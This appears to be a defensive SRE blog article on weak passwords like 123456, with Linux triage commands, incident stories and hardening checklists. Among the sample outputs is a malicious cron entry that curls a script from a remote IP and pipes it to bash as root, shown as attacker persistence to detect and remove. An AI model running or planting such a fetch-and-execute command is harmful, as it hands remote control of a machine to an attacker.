123456: Humanity’s Favorite Self-Sabotage

Production outages don’t always start with a kernel panic, a bad deploy, or a storage controller having a dramatic retirement. Sometimes they start with a six-digit shrug: 123456. A password that says, “I acknowledge the concept of security, and I choose vibes instead.”

If you run systems for a living, you’ve seen it: a sudden wave of failed logins, a compromised admin panel, a “new user created” event no one admits to, and then the real fun—cryptominers, data exfiltration, or a ransom note delivered with the politeness of a crowbar.

Why 123456 keeps winning

People don’t pick 123456 because they’re malicious. They pick it because it’s the path of least resistance in a world designed to demand passwords everywhere, all the time, with inconsistent UX and inconsistent consequences. Then we act surprised when attackers do the obvious thing and try the obvious password.

From an SRE perspective, 123456 is not just a “security problem.” It’s an availability problem. Once an attacker gets a foothold via a weak password, they don’t politely stop at reading data. They burn CPU, saturate disks, hammer databases, spam outbound mail until your IP reputation is a crater, and trigger auto-scaling loops that look like “growth” until Finance calls.

And from a storage engineer perspective, compromised accounts love to turn durable storage into expensive confetti: encrypting files, snapshotting at the wrong cadence, deleting backups with the same credentials, and filling volumes with garbage until everything is read-only and everyone is suddenly very interested in “retention policies.”

Here’s the uncomfortable truth: 123456 isn’t a password. It’s a vote for failure. Your job isn’t to shame people into better voting. Your job is to design systems where that vote can’t pass.

One quote to frame the mindset, because it holds up in every postmortem: “Hope is not a strategy” — the traditional SRE saying.

Facts and historical context (short, concrete, useful)

  • Password reuse became normal when the average person started managing dozens of logins; human memory didn’t scale, so attackers scaled instead.
  • Default credentials shipped on devices and appliances for decades because it reduced support calls and sped up installation.
  • Credential stuffing became mainstream once breach dumps were large and searchable; attackers stopped “guessing” and started “replaying.”
  • Online brute force got cheaper as botnets and cloud infrastructure made distributed attempts easy to rotate and hard to block.
  • Lockout policies backfired in many orgs by enabling denial-of-service: attackers lock out executives on purpose during incidents.
  • SMS-based MFA rose because it was easy, then was repeatedly undermined by SIM swapping and weak telco processes.
  • “Password complexity rules” often improved neither security nor usability; users responded with patterns that were predictable at scale.
  • Service accounts historically escaped scrutiny because they don’t complain; they just keep working until they quietly become your worst credential-hygiene problem.
  • Secrets in code weren’t considered “secrets” in many older workflows; config files and repositories were treated as internal and therefore safe.

What 123456 enables: threat model and failure modes

The attacker’s playbook is boring, which is why it works

When an attacker tries 123456, they’re not being clever. They’re being efficient. They’re targeting the long tail of accounts and interfaces that you forgot, inherited, or never knew existed:

  • Admin panels exposed “temporarily” during a migration.
  • SSH on a bastion where someone created a local user “just for a minute.”
  • Database dashboards with local auth still enabled because SSO “was on the roadmap.”
  • Storage appliances with a web UI protected by defaults.
  • CI/CD systems where a service token has admin scopes because “it needed to deploy.”

Why weak credentials are an uptime issue

After compromise, the payloads that hurt production tend to be:

  • Resource theft: cryptomining, proxying, spam. You notice via CPU spikes, load averages, egress cost, and throttled neighbors.
  • Data access: exfiltration or data scraping. You notice via unusual query patterns, long-running exports, and storage read storms.
  • Destruction: encryption, deletion, snapshot removal. You notice via write amplification, full disks, missing backups, and suddenly-loud executives.

Weak passwords are the first domino. The rest of the line is made of your real production dependencies: identity, network, logging, backup, and the parts of your storage layout that you only think about when they’re on fire.

Short joke #1: A password like 123456 is basically a welcome mat, except the mat also hands out admin access.

Fast diagnosis playbook: find the bottleneck in minutes

When the alarm goes off—login failures spike, accounts get locked, CPU pins, disks thrash—your first job is to determine whether you’re dealing with (a) password guessing, (b) credential stuffing with valid logins, or (c) post-compromise activity. Here’s the sequence that saves time.

First: is this authentication pressure or post-auth damage?

  1. Check failed login rates at the edge (reverse proxy, WAF, SSH). If failures are spiking, you’re likely seeing guessing or stuffing.
  2. Check successful login anomalies (new IPs, new geos, odd user agents, logins at weird times). If success is spiking or patterns shift, assume compromise.
  3. Check system saturation signals: CPU, memory, load, disk I/O, and network egress. If resources are pegged, you may already be running attacker workloads.

Second: identify the chokepoint (CPU? disk? network? locks?)

  1. CPU pinned: crypto workloads and compression (mostly user time), or TLS storms and packet floods (mostly system and softirq time). Either way, the box is doing someone else’s work.
  2. Disk pinned with high await: logging amplification, database write storms, encryption processes, or full filesystems.
  3. Network egress pinned: exfiltration, spam, proxying, or botnet C2.
  4. Auth backend pinned: LDAP/AD/IdP struggling, causing cascading retries and timeouts.

Third: apply containment that doesn’t break the world

  1. Rate-limit and block at the edge (temporary, targeted). Don’t DDoS yourself with blanket rules.
  2. Disable or fence high-risk interfaces (admin portals, legacy auth endpoints).
  3. Force resets / revoke tokens for affected identities, starting with privileged and service accounts.
  4. Preserve evidence: rotate credentials, but keep logs and a snapshot of compromised hosts if you can do it safely.

Practical tasks (commands, outputs, decisions)

These are real things you can run on a Linux fleet, a proxy, or a node in the blast radius. Each task includes a command, example output, what it means, and what decision you make.

1) Spot a brute-force wave against SSH

cr0x@server:~$ sudo journalctl -u ssh --since "30 min ago" | grep -E "Failed password|Invalid user" | tail -n 8
Jan 22 11:41:02 server sshd[23144]: Failed password for invalid user admin from 203.0.113.77 port 52110 ssh2
Jan 22 11:41:05 server sshd[23144]: Failed password for invalid user admin from 203.0.113.77 port 52110 ssh2
Jan 22 11:41:09 server sshd[23149]: Failed password for root from 198.51.100.24 port 44891 ssh2
Jan 22 11:41:13 server sshd[23152]: Invalid user test from 203.0.113.77 port 52112
Jan 22 11:41:16 server sshd[23152]: Failed password for invalid user test from 203.0.113.77 port 52112 ssh2
Jan 22 11:41:20 server sshd[23158]: Failed password for ubuntu from 198.51.100.24 port 44902 ssh2
Jan 22 11:41:24 server sshd[23158]: Failed password for ubuntu from 198.51.100.24 port 44902 ssh2
Jan 22 11:41:29 server sshd[23163]: Failed password for invalid user oracle from 192.0.2.10 port 60123 ssh2

Meaning: Multiple IPs, common usernames, rapid failures. This is automated guessing.

Decision: If you still allow password auth on SSH, stop. Switch to keys, rate-limit, and block abusive sources.

2) Count failures per source IP (fast triage)

cr0x@server:~$ sudo journalctl -u ssh --since "30 min ago" | grep "Failed password" | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr | head
120 203.0.113.77
64 198.51.100.24
18 192.0.2.10

Meaning: Top talkers. The worst IP is doing most of the damage.

Decision: Block the top sources at the firewall while you implement durable controls (keys, MFA, fail2ban, WAF rules).
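
If fail2ban fits your fleet, a minimal jail turns this triage into automated, temporary bans. A sketch, assuming the stock Debian/Ubuntu package, which reads drop-ins from /etc/fail2ban/jail.d/:

cr0x@server:~$ sudo apt install fail2ban
cr0x@server:~$ sudo tee /etc/fail2ban/jail.d/sshd.local >/dev/null <<'EOF'
[sshd]
enabled  = true
maxretry = 5
findtime = 10m
bantime  = 1h
EOF
cr0x@server:~$ sudo systemctl restart fail2ban && sudo fail2ban-client status sshd

Older fail2ban releases want plain seconds instead of the 10m/1h suffixes; check your version before copy-pasting.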

3) Check whether SSH password authentication is enabled

cr0x@server:~$ sudo sshd -T | grep -E 'passwordauthentication|permitrootlogin|pubkeyauthentication'
passwordauthentication yes
permitrootlogin prohibit-password
pubkeyauthentication yes

Meaning: Passwords are allowed. That’s your open invitation to credential guessing.

Decision: Set PasswordAuthentication no, reload SSH, ensure out-of-band access exists, and verify key distribution first.
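
One way to do that, assuming a reasonably current OpenSSH that reads drop-ins from /etc/ssh/sshd_config.d/ (Debian and Ubuntu defaults do) and that your keys are already distributed:

cr0x@server:~$ printf 'PasswordAuthentication no\nKbdInteractiveAuthentication no\n' | sudo tee /etc/ssh/sshd_config.d/50-no-passwords.conf
cr0x@server:~$ sudo sshd -t && sudo systemctl reload ssh

On older OpenSSH the second knob is spelled ChallengeResponseAuthentication. Keep an existing session open and test a fresh key-based login before you close it.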

4) Apply a targeted firewall block (temporary containment)

cr0x@server:~$ sudo iptables -I INPUT -s 203.0.113.77 -p tcp --dport 22 -j DROP
cr0x@server:~$ sudo iptables -L INPUT -n --line-numbers | head -n 10
Chain INPUT (policy ACCEPT)
num  target     prot opt source           destination
1    DROP       tcp  --  203.0.113.77     0.0.0.0/0            tcp dpt:22
2    ACCEPT     all  --  0.0.0.0/0        0.0.0.0/0

Meaning: The host will drop SSH packets from that source.

Decision: Use this for immediate relief. Don’t confuse it with a long-term control; attackers rotate IPs.
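
When sources rotate faster than you can type, an ipset with a timeout keeps the temporary blocklist manageable and self-expiring. A sketch, assuming the ipset package is installed:

cr0x@server:~$ sudo ipset create ssh-abuse hash:ip timeout 3600
cr0x@server:~$ sudo ipset add ssh-abuse 203.0.113.77
cr0x@server:~$ sudo ipset add ssh-abuse 198.51.100.24
cr0x@server:~$ sudo iptables -I INPUT -p tcp --dport 22 -m set --match-set ssh-abuse src -j DROP

Entries expire after an hour, which matches reality: the IPs will belong to someone else by tomorrow anyway.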

5) Confirm whether you’re facing credential stuffing on a web login

cr0x@server:~$ sudo awk '$9 ~ /401|403/ {print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -nr | head
980 203.0.113.88
744 198.51.100.61
233 192.0.2.44

Meaning: High volume of auth failures from a few IPs. This is likely automated.

Decision: Rate-limit login endpoints, enable bot mitigation, and check whether any successes are happening from the same sources.
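
On nginx, that rate limit is a handful of lines. A sketch only: the zone size, rate, and upstream name are placeholders to tune for your own traffic.

# http {} context: track clients by IP, allow roughly 5 login attempts per minute
limit_req_zone $binary_remote_addr zone=login_zone:10m rate=5r/m;

# server {} context: apply it to the login endpoint only
location = /login {
    limit_req zone=login_zone burst=10 nodelay;
    limit_req_status 429;
    proxy_pass http://app_upstream;   # placeholder upstream name
}

Returning 429 at the edge is far cheaper than letting every guess reach your password-hashing tier.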

6) Find suspicious successful logins (same endpoint, different response)

cr0x@server:~$ sudo awk '$7 ~ /\/login/ && $9 ~ /200|302/ {print $1, $4, $5, $7, $9, $12}' /var/log/nginx/access.log | tail -n 5
198.51.100.61 [22/Jan/2026:11:32:09 +0000] /login 302 "Mozilla/5.0"
203.0.113.88 [22/Jan/2026:11:32:14 +0000] /login 302 "python-requests/2.31.0"
192.0.2.44 [22/Jan/2026:11:32:19 +0000] /login 302 "Mozilla/5.0"
198.51.100.61 [22/Jan/2026:11:32:21 +0000] /login 302 "Mozilla/5.0"
203.0.113.88 [22/Jan/2026:11:32:25 +0000] /login 302 "python-requests/2.31.0"

Meaning: There are successes mixed into the failure storm, including a scripted client. That’s a red flag.

Decision: Treat as potential account takeover. Start session invalidation and investigate affected accounts immediately.

7) Check for new local users (post-compromise persistence)

cr0x@server:~$ sudo awk -F: '$3 >= 1000 {print $1 ":" $3 ":" $7}' /etc/passwd
ubuntu:1000:/bin/bash
deploy:1001:/bin/bash
backup:1002:/usr/sbin/nologin

Meaning: Local accounts exist beyond system users. The question is: are they expected?

Decision: If an unexpected interactive user appears, assume compromise. Disable it, rotate keys/tokens, and examine auth logs for creation time.
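
A containment sketch for an unexpected account (the username here is a placeholder), assuming Debian/Ubuntu-style auth logging:

cr0x@server:~$ sudo usermod --lock --shell /usr/sbin/nologin intruder
cr0x@server:~$ sudo pkill -KILL -u intruder
cr0x@server:~$ sudo grep -E "useradd|new user|new group" /var/log/auth.log | tail -n 3

useradd logs the account creation with a timestamp, which anchors your incident timeline.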

8) Identify outbound egress spikes (data theft or spam)

cr0x@server:~$ sudo ss -tnp state established '( sport = :443 or sport = :80 )' | head
ESTAB 0 0 10.0.1.12:443 198.51.100.200:51844 users:(("nginx",pid=1203,fd=33))
ESTAB 0 0 10.0.1.12:443 203.0.113.200:49210 users:(("nginx",pid=1203,fd=41))
ESTAB 0 0 10.0.1.12:443 192.0.2.200:37214 users:(("nginx",pid=1203,fd=52))

Meaning: This filter catches connections on your web ports, which are mostly inbound clients and perfectly normal; real egress is traffic the host initiates, so what matters is volume and destination.

Decision: If you see thousands of outbound connections from a box that shouldn’t initiate them, start containment and inspect processes.
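
For the outbound side specifically, a quick count of established connections by remote address shows whether the box is talking to the world far more than it should. A minimal sketch (IPv4-oriented; IPv6 addresses need smarter splitting):

cr0x@server:~$ ss -tn | awk '$1 == "ESTAB" {split($5, peer, ":"); print peer[1]}' | sort | uniq -c | sort -nr | head

Hundreds of connections to a single unfamiliar address from a host that should only answer requests is your cue to isolate it.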

9) Find top CPU processes (cryptominer tells on itself)

cr0x@server:~$ ps -eo pid,comm,%cpu,%mem --sort=-%cpu | head
  PID COMMAND  %CPU %MEM
 8442 kswapd0  92.1  0.0
 9011 xmrig    88.3  1.2
 1203 nginx    14.2  0.8
  982 mysqld    7.4 12.3

Meaning: A process like xmrig is a classic mining workload. Treat that kswapd0 with suspicion too: the real one is a kernel thread with no /proc/PID/exe, and miners love borrowing kernel-thread names; if it is genuine, it signals memory pressure and thrash.

Decision: Quarantine host, kill process, preserve evidence if required, rotate credentials, and scan for persistence (cron, systemd units, bashrc).
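
A quick persistence sweep beyond cron, assuming a systemd host; timers, recently changed unit files, and shell profiles are the usual hiding spots:

cr0x@server:~$ systemctl list-timers --all | head
cr0x@server:~$ sudo find /etc/systemd/system /usr/lib/systemd/system -type f -mtime -3
cr0x@server:~$ sudo grep -R -E "curl|wget|base64" /etc/cron* /var/spool/cron /root/.bashrc 2>/dev/null

Anything created or modified around the compromise window gets read line by line, not skimmed.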

10) Detect suspicious cron entries (persistence)

cr0x@server:~$ sudo crontab -l
no crontab for root
cr0x@server:~$ sudo ls -l /etc/cron.d
total 8
-rw-r--r-- 1 root root 201 Jan 21 09:10 logrotate
-rw-r--r-- 1 root root 118 Jan 22 11:29 sys-update
cr0x@server:~$ sudo cat /etc/cron.d/sys-update
*/5 * * * * root curl -fsSL http://192.0.2.55/u.sh | bash

Meaning: A cron job pulling a script over HTTP is almost never “maintenance.” It’s persistence.

Decision: Remove it, block egress to the host, search fleet for the same signature, and treat secrets on this machine as burned.
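
A crude fleet sweep finds copies fast; this sketch assumes SSH access with passwordless sudo from a management host and a hosts.txt you maintain (substitute your orchestration tool of choice):

cr0x@server:~$ while read -r host; do echo "== $host =="; ssh -n -o ConnectTimeout=5 "$host" 'sudo grep -Rl "192.0.2.55" /etc/cron* /var/spool/cron 2>/dev/null'; done < hosts.txt

Any host that prints a file path joins the incident, whether it wanted to or not.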

11) Check Linux password policy (are you allowing garbage?)

cr0x@server:~$ sudo grep -E 'PASS_(MAX|MIN)_DAYS|PASS_MIN_LEN' /etc/login.defs
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_MIN_LEN    6

Meaning: Six characters minimum and effectively never expiring is an invitation for weak passwords and eternal risk.

Decision: Move to stronger requirements and, more importantly, MFA and key-based auth for admins. Expiration alone is not a fix; it can increase reuse.
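
On PAM-based distributions, PASS_MIN_LEN in login.defs is largely ignored anyway; the control that actually bites is pam_pwquality. A sketch, assuming the Debian/Ubuntu package name:

cr0x@server:~$ sudo apt install libpam-pwquality
cr0x@server:~$ sudo tee -a /etc/security/pwquality.conf >/dev/null <<'EOF'
minlen = 14
dictcheck = 1
usercheck = 1
enforce_for_root
EOF

The package should wire itself into common-password via pam-auth-update; verify with a test password change rather than trusting the install output.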

12) Verify account lockout policy on PAM (avoid self-DoS)

cr0x@server:~$ sudo grep -R "pam_faillock" -n /etc/pam.d/common-auth
12:auth required pam_faillock.so preauth silent deny=5 unlock_time=900
13:auth [default=die] pam_faillock.so authfail deny=5 unlock_time=900

Meaning: Lockout after 5 failures for 15 minutes. This can stop guessing, but it can also be weaponized.

Decision: For high-value accounts, prefer MFA + rate limits + anomaly detection. Keep lockout, but scope it carefully and protect critical users from targeted lockout.

13) Detect weak passwords in AD with a safe approach (no plaintext, no guessing in prod)

cr0x@server:~$ sudo samba-tool domain passwordsettings show
Minimum password length: 12
Password complexity: on
Password history length: 24
Maximum password age (days): 0

Meaning: Policy is decent on paper: 12 chars, complexity on, no forced rotation.

Decision: Policy alone doesn’t stop 123456 if you have legacy exceptions, local apps, or external auth. Use banned password lists and check for weak passwords with approved tooling.

14) Confirm whether your app still supports local admin login

cr0x@server:~$ grep -R "local_auth" -n /etc/myapp/config.yml
41:local_auth: true

Meaning: Local auth is enabled; SSO may exist but isn’t enforced.

Decision: Turn off local auth or restrict it to break-glass accounts stored in a vault with MFA and monitoring.

15) Check for leaked secrets in environment files (service credentials love hiding here)

cr0x@server:~$ sudo grep -R "PASSWORD=" -n /etc/systemd/system | head
/etc/systemd/system/api.service.d/override.conf:3:Environment="DB_PASSWORD=123456"
/etc/systemd/system/worker.service.d/override.conf:4:Environment="REDIS_PASSWORD=redispass"

Meaning: You have plaintext secrets in service configs, including a literal 123456. This is not rare. It is just expensive.

Decision: Move secrets into a proper secret store, rotate them, and restrict read permissions on unit files. Audit for spread.
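
One way to get that literal 123456 out of the unit file, assuming systemd 247+ and an application that can read a secret from a file instead of an environment variable (both assumptions worth verifying; merge the override with whatever else already lives in it):

cr0x@server:~$ sudo mkdir -p /etc/credstore && sudo chmod 700 /etc/credstore
cr0x@server:~$ sudo sh -c 'umask 077; echo "ROTATED-SECRET-GOES-HERE" > /etc/credstore/api-db-password'
cr0x@server:~$ sudo tee /etc/systemd/system/api.service.d/override.conf >/dev/null <<'EOF'
[Service]
# replaces the old Environment="DB_PASSWORD=..." line entirely
LoadCredential=db_password:/etc/credstore/api-db-password
EOF
cr0x@server:~$ sudo systemctl daemon-reload && sudo systemctl restart api

The service then reads $CREDENTIALS_DIRECTORY/db_password at startup. If the app can only consume environment variables, a secret manager with an exec wrapper is the next-best step.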

16) Validate backups are immutable or at least separated (storage engineer’s sanity check)

cr0x@server:~$ zfs list -t snapshot -o name,creation | tail -n 5
tank/backups@2026-01-21_0200  Wed Jan 21 02:00 2026
tank/backups@2026-01-21_0400  Wed Jan 21 04:00 2026
tank/backups@2026-01-21_0600  Wed Jan 21 06:00 2026
tank/backups@2026-01-21_0800  Wed Jan 21 08:00 2026
tank/backups@2026-01-21_1000  Wed Jan 21 10:00 2026

Meaning: Snapshots exist. That’s necessary, not sufficient.

Decision: If the same credentials that can delete production can delete snapshots, you don’t have a recovery plan—you have a hope plan. Separate duties and protect backups.
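
On ZFS, two boring primitives go a long way: delegate the backup identity only the permissions it needs, and put holds on snapshots you cannot afford to lose. A sketch; the user name is a placeholder and the exact permission set depends on your replication flow:

cr0x@server:~$ sudo zfs allow backupsvc send,snapshot,hold tank/backups   # note: no destroy
cr0x@server:~$ sudo zfs allow tank/backups                                # verify what is actually delegated
cr0x@server:~$ sudo zfs hold keep-weekly tank/backups@2026-01-21_0200     # held snapshots refuse destruction

Destroy rights live with a separate, rarely used identity, and releasing a hold becomes a deliberate, logged act instead of a side effect of one stolen password.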

Short joke #2: If your incident plan relies on “nobody would try 123456,” you’ve built a museum exhibit, not a security program.

Three corporate mini-stories from the trenches

Mini-story 1: The incident caused by a wrong assumption

A mid-size SaaS company had a customer admin portal, sitting behind a CDN and a modern reverse proxy. The engineering team assumed the login endpoint was “safe enough” because the proxy had some generic bot rules, and because the application had a lockout policy: five failed attempts, then a 10-minute cooldown.

Then the support queue lit up. Customers couldn’t log in. The ops dashboard showed a clean bill of health: CPU normal, memory normal, error rates slightly elevated but not dramatic. It looked like a UX problem. It was not a UX problem.

Attackers weren’t trying to break into accounts. They were trying to deny access by deliberately locking out high-value customer admins. It was “credential stuffing” with a twist: even without valid credentials, the lockout itself was the payload. The team’s assumption—“lockout protects us”—turned out to be the threat model the attacker wanted.

Containment was uncomfortable: they disabled lockout temporarily for customer admins, switched to rate limits and IP reputation at the edge, and added an adaptive challenge step for suspicious login attempts. The customer pain dropped immediately.

The long-term fix was cleaner: enforce MFA for admin roles, add anomaly detection for lockout patterns, and change lockout behavior to slow down attackers without blocking legitimate users (progressive delays rather than hard lockouts).

Mini-story 2: The optimization that backfired

A fintech company had strict password hashing settings—strong algorithm, high cost factor. Good. Then they had a performance incident: login latencies jumped during peak hours. The quick fix was framed as “optimization”: lower the hash cost so authentication wouldn’t be CPU-bound.

It worked. Latency improved. Graphs calmed down. Everyone congratulated themselves for being pragmatic under pressure, which is how you know you’re about to learn something.

Within weeks, the organization saw a spike in account takeovers, mostly on accounts with reused passwords. The attackers weren’t cracking hashes offline; they were stuffing credentials online. But the lowered cost reduced the CPU penalty of each login attempt, making the service more responsive to attackers too. Rate limits were mild. WAF rules were generic. The optimization increased the effective throughput of the attacker pipeline.

The remediation was a full-circle SRE lesson: you don’t “optimize” authentication by weakening it. You add capacity, you add smarter throttles, you add MFA, you enforce better session management, and you protect the login endpoint like it’s a production database—because it is.

They re-raised the hashing cost, implemented progressive delays, and moved high-risk auth checks to a dedicated tier with autoscaling and strict observability. They also learned to measure attacker traffic as a first-class workload.

Mini-story 3: The boring but correct practice that saved the day

A healthcare org ran a mix of on-prem and cloud systems, including storage that held regulated data. They were not flashy. They did not buy every new security product. They did two boring things consistently: centralized logging with retention, and regular credential audits for privileged accounts and service accounts.

One morning, alerts fired for unusual outbound egress from an application server. The immediate suspicion was malware. But the on-call had something better than suspicion: a clear login trail. The logs showed a successful admin login to a legacy dashboard from an IP range that never appeared before, followed by API token creation.

The token was created with a service account that had been exempted from MFA “temporarily” months earlier. That exemption had a ticket, and the ticket had an owner. That owner was reachable. The timeline was short because the evidence was already there, not spread across ten places.

They revoked tokens, rotated the service account credentials, and blocked egress. Most importantly, they restored confidence quickly: backups were on a separate system with separate credentials, and snapshots were retained with controlled deletion rights.

The incident became a minor event rather than a major breach. Not because they were lucky, but because they treated identity as production infrastructure and did the boring maintenance before the exciting failure.

Common mistakes: symptom → root cause → fix

1) Symptom: “We’re seeing thousands of failed logins, but no compromises”

Root cause: You’re assuming compromise only means “data accessed.” Attackers also do account lockout DoS, enumeration, and recon.

Fix: Track failed logins as an availability SLO concern. Add rate limits, progressive delays, and bot detection. Protect the login endpoint like a production API.

2) Symptom: “We enabled MFA, but attackers still got in”

Root cause: MFA wasn’t enforced for all privileged paths (legacy local admin, API tokens, service accounts, break-glass accounts). Or you used weak factors without compensating controls.

Fix: Inventory every auth path: UI, API, SSH, database consoles, admin dashboards. Enforce MFA and conditional access consistently. Remove legacy paths or gate them behind stronger controls.

3) Symptom: “Users keep choosing weak passwords despite policy”

Root cause: Complexity rules trained users to create predictable patterns; you didn’t implement banned password lists or password managers.

Fix: Use a banned-password list and require longer passphrases. Provide a password manager and make it the default, not a suggestion.

4) Symptom: “A single compromised account took down backups too”

Root cause: Backup deletion rights shared with production admin rights; no immutability or separation of duties.

Fix: Split credentials and roles. Use immutable backups or at least write-once retention and dedicated backup identities. Monitor snapshot deletion events aggressively.

5) Symptom: “We blocked IPs, but the attack continues”

Root cause: You’re fighting a distributed system with a static list. Attackers rotate IPs via botnets and cloud ranges.

Fix: Use rate limiting, behavioral detection, and identity-based controls (MFA, token binding, device posture), not just IP blocks.

6) Symptom: “We can’t disable password auth on SSH because automation will break”

Root cause: Automation is using shared passwords or ad-hoc local users, not keys, not short-lived credentials.

Fix: Move automation to SSH keys (or better: short-lived certs). Rotate and scope credentials. Treat automation identities as high-privilege service accounts.
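
Short-lived SSH certificates are the cleanest upgrade for automation: the CA signs a key that expires on its own. A sketch with placeholder paths and a hypothetical “deploy” principal:

cr0x@server:~$ ssh-keygen -s /secure/ca/automation_ca -I deploy-bot -n deploy -V +1h /home/deploy/.ssh/id_ed25519.pub
cr0x@server:~$ ssh-keygen -L -f /home/deploy/.ssh/id_ed25519-cert.pub
# servers trust the CA with one sshd_config line: TrustedUserCAKeys /etc/ssh/automation_ca.pub

A leaked certificate is a one-hour problem instead of a forever problem.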

7) Symptom: “Login latency spikes during attack traffic”

Root cause: Authentication is CPU-bound (hashing cost, TLS termination), or auth backend is saturated (LDAP/IdP timeouts). Retries amplify load.

Fix: Isolate auth tier, autoscale, cache responsibly, add circuit breakers, and throttle login attempts early (edge) before backend work.

8) Symptom: “We rotated passwords, but suspicious activity continues”

Root cause: Tokens/sessions weren’t revoked; attacker has persistence (cron/systemd), or other credentials were also compromised.

Fix: Invalidate sessions, revoke tokens, rotate all secrets in the blast radius, hunt persistence, and verify via logs that old tokens no longer work.

Checklists / step-by-step plan

Step-by-step: eliminate 123456-class failures without boiling the ocean

  1. Inventory auth surfaces. List every login path: web apps, admin portals, SSH, VPN, databases, storage UIs, CI/CD, monitoring tools.
  2. Kill default credentials. For anything shipped with defaults, change them during provisioning. No exceptions.
  3. Enforce MFA for privileged roles first. Admins, operators, CI/CD maintainers, storage admins, and any account that can delete backups.
  4. Disable password auth where possible. SSH should be key-based; internal admin panels should be behind SSO with conditional access.
  5. Implement a banned-password policy. Explicitly reject known weak strings and common sequences, including 123456 and friends.
  6. Fix service accounts. No shared passwords. Prefer short-lived tokens. Scope permissions. Rotate on a schedule you actually follow.
  7. Add rate limiting and progressive delays. At the edge, before expensive backend operations. Treat auth as a hot path.
  8. Centralize logs and keep them. Authentication logs, admin actions, token creation, snapshot deletions, and privilege changes.
  9. Separate backup authority. Backups must survive the compromise of production admin credentials.
  10. Run tabletop exercises. Practice “credential stuffing + partial compromise” and measure time-to-containment and time-to-restore.

Operational checklist for an active attack

  • Confirm whether successes are occurring among failures (stuffing vs guessing).
  • Block/rate-limit at the edge; don’t hammer your IdP/LDAP with retries.
  • Identify targeted accounts (privileged first). Force resets and revoke sessions/tokens.
  • Inspect for persistence on hosts that show anomalous behavior.
  • Preserve logs and relevant host artifacts; don’t wipe first and ask questions later.
  • Verify backup integrity and isolation before you need it.

FAQ

Why is 123456 still so common?

Because friction is real and consequences are delayed. People optimize for “works now,” especially under time pressure. Systems need to make the secure path the easiest path.

Is banning 123456 enough?

No. Banning known weak passwords is table stakes. The real win comes from MFA, eliminating password auth where possible, and limiting blast radius via least privilege and token scoping.

Does password complexity help?

Sometimes, but it often trains predictable patterns. Prefer longer passphrases, banned-password lists, and password managers. Complexity without usability becomes reuse.

Should we force password rotation every 90 days?

Not by default. Forced rotation can increase predictable changes and reuse unless you have evidence of compromise. Rotate when risk changes (breach, role change, suspicious activity) and for service accounts on a managed schedule.

What’s the difference between brute force and credential stuffing?

Brute force guesses passwords blindly. Credential stuffing reuses known username/password pairs from previous breaches. Stuffing succeeds more often, so you must monitor successful logins for anomalies, not just failures.

What should we do about service accounts that “can’t use MFA”?

That phrase usually means “we built it wrong.” Use short-lived tokens, workload identity, SSH certificates, or tightly scoped API keys stored in a secret manager. If you must use a static secret, rotate it and constrain its permissions brutally.

How do we avoid locking out legitimate users during an attack?

Use progressive delays, device/IP reputation, and challenges rather than hard lockouts. Hard lockouts are easy for attackers to weaponize, especially against VIP accounts.

What logs matter most when investigating account takeover?

Auth events (success/failure), token/session creation and revocation, privilege/role changes, password resets, and sensitive admin actions (export, delete, snapshot destroy). Keep timestamps consistent and searchable.

How does this relate to storage and backups specifically?

Compromised credentials are frequently used to delete snapshots, encrypt file shares, and destroy restore points. Storage resilience is an identity problem: separate credentials, immutable retention, and monitored deletion rights.

Is MFA enough to stop everything?

No. It dramatically reduces risk, but attackers pivot: session hijacking, token theft, social engineering, and exploiting legacy auth paths. MFA is a foundation, not a finish line.

Next steps that actually reduce risk

Start with the places where 123456 hurts the most: privileged accounts, exposed admin interfaces, SSH, and anything that can delete backups. Do the unglamorous work: inventory auth surfaces, enforce MFA consistently, disable password auth where you can, and add rate limiting that protects your backend from doing expensive work on attacker demand.

Then make recovery real. Separate backup authority, test restores, and monitor the events that matter: token creation, role changes, snapshot deletions, and successful logins from new contexts. If you can’t answer “who logged in, from where, and what did they do” within minutes, your logging isn’t observability—it’s decoration.

The goal isn’t to teach humans to stop being human. The goal is to run systems that don’t let six digits turn into six-figure damage.
